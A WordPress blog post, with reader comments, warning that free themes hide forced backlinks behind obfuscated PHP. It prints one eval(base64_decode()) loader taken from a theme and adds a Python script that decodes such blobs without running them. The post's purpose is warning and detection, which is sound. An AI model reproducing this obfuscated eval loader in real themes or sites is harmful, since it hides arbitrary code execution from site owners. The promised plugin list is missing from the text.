WordPress Advice of the Month: Why Free Themes are EVIL

Let’s start a new series on this blog. Today, Jan 31st, is the B-day of the “WordPress Advice of the Month” series. Now some rules.

This sounds like it’s going to be a monthly series. But it’s not. Good WordPress advice is not that easy to find. I mean, there are loads of stuff out there, but not everything is really that interesting or valuable.

WordPress has been around for quite some time now. Many people are familiar with it. The level of so-called common knowledge is rather high. This results in a situation where 90% of new posts keep explaining the same ol’ stuff over and over again (just rehashing it slightly). New ideas are in the minority.

It’s somewhat similar to the situation in the “blogging about blogging” world. It seems like every day I see a post saying that the number one most important thing is to produce “good, valuable content”. Come on, if I had a nickel for every time someone wrote that… But it’s just a side note/rant.

Ok, let’s just get on with it

This month’s WordPress advice of the month touches upon the situation with free WordPress themes, and comes from the WPMU team. Here’s the post I’m talking about:

Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else

The biggest problem with free WordPress themes is that they are not really free.

If you’re using one you are paying with your link juice (I love that phrase – “link juice” – sounds delicious, anyway). Most of the free themes force you to link back to something. And most of the time it’s not even the website of the creators themselves. What you usually end up with is a bunch of links to places like dating sites, affiliate offers, even link farms. Not cool. But you can always remove the links by hand, right?

Wrong. In most cases you can’t, because the links are not placed in the manner you were taught by the programming gods. Theme creators are using obfuscated code (base64-encoded rather than truly encrypted). It prevents you from removing the links, because if you try, the theme just stops working.

Here’s an example of such code:

<?php eval( base64_decode( 'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF
9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SP
WVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciL
CRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

This particular code comes from one of the themes I’ve been using. The most important part of this fragment is the use of the eval() and base64_decode() PHP functions.

Let me tell you something about the eval() function. What it basically does is evaluate a given string as PHP code. In plain English, it means that it can be used to perform almost ANY operation on your web server! PHP is an easy-to-use yet very powerful programming language. You shouldn’t give anybody the power to run eval() on your server. Especially if you never met the guy, and all you know about him is that he created a nice looking WordPress theme.
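
To see what a fragment like the one above hides without ever running it, the base64 payload can be decoded statically. The Python script below is an added example, not code from this post or from the WPMU article; the function name decode_hidden_php and the list of risky PHP calls are assumptions made for illustration.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with straight or typographic quotes; the blob
# may be wrapped over several lines, as it is in the post.
LOADER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"‘’]([A-Za-z0-9+/=\s]+)['\"‘’]\s*\)\s*\)",
    re.IGNORECASE,
)
# PHP functions that commonly indicate a further hidden layer (assumed list).
RISKY = ("eval", "base64_decode", "strtr", "gzinflate", "str_rot13")


def decode_hidden_php(source):
    """Return one finding per eval(base64_decode()) call, decoded but never executed."""
    findings = []
    for match in LOADER.finditer(source):
        blob = "".join(match.group(1).split())  # drop line wraps inside the blob
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, so not the pattern we are looking for
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "decoded": decoded,
            "risky_calls": [f for f in RISKY
                            if re.search(r"\b" + f + r"\s*\(", decoded)],
        })
    return findings


# The fragment quoted in the post, wrapped as it appears there.
SAMPLE = """<?php eval( base64_decode( 'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF
9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SP
WVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciL
CRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>"""

if __name__ == "__main__":
    for finding in decode_hidden_php(SAMPLE):
        print("line", finding["line"], "calls", finding["risky_calls"])
        print(finding["decoded"])
```

Decoded, the fragment turns out to be only a loader: it base64-decodes a second variable, remaps its characters with strtr() and passes the result to eval(), so the real payload sits elsewhere in the theme file.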

What you can do

First of all, read the post by the WPMU team, you will find a much more complete explanation there. Then use three little plugins and check your theme for any malicious behavior. These plugins are:

Then come back and share your results here. Is your theme safe?

6 Comments

  1. Tweets that mention Why Free Themes are EVIL - Wordpress Advice of the Month -- Topsy.com

    […] This post was mentioned on Twitter by Karol K, Łukasz Chojnowski. Łukasz Chojnowski said: RT @carlosinho: Just posted: WordPress Advice of the Month: Why Free Themes are EVIL – http://bit.ly/edBe5S […]

  2. Kimberly Young

    I quite understand you. Measure thrice and cut once 😐

  3. Don’t Commit the Premature Publication Sin, Ask Yourself These 9 Questions First

    […] there’s more! If you’re just starting your blogging adventure don’t forget to check out my WordPress advice of the month, and the WordPress […]

  4. Best WordPress Hacks of All Time - WordPress Advice of the Month

    […] Today it’s time for another edition of the “WordPress Advice of the Month” monthly series, which isn’t really monthly, by the way. (Here’s the previous episode, in case you missed it: Why Free Themes are EVIL) […]

  5. Spatch Merlin - How to Blog

    When something comes in free, there is always a catch. And that’s the catch when you use ‘free’ WP themes. It’s smart to buy one if you’re planning to monetize your blog.

  6. Good one I had to get rid of some code previously. Btw is “there’re” even a word. Never seen the apostrophe being used like this before. Perhaps it was a tactic to get someone to comment 🙂
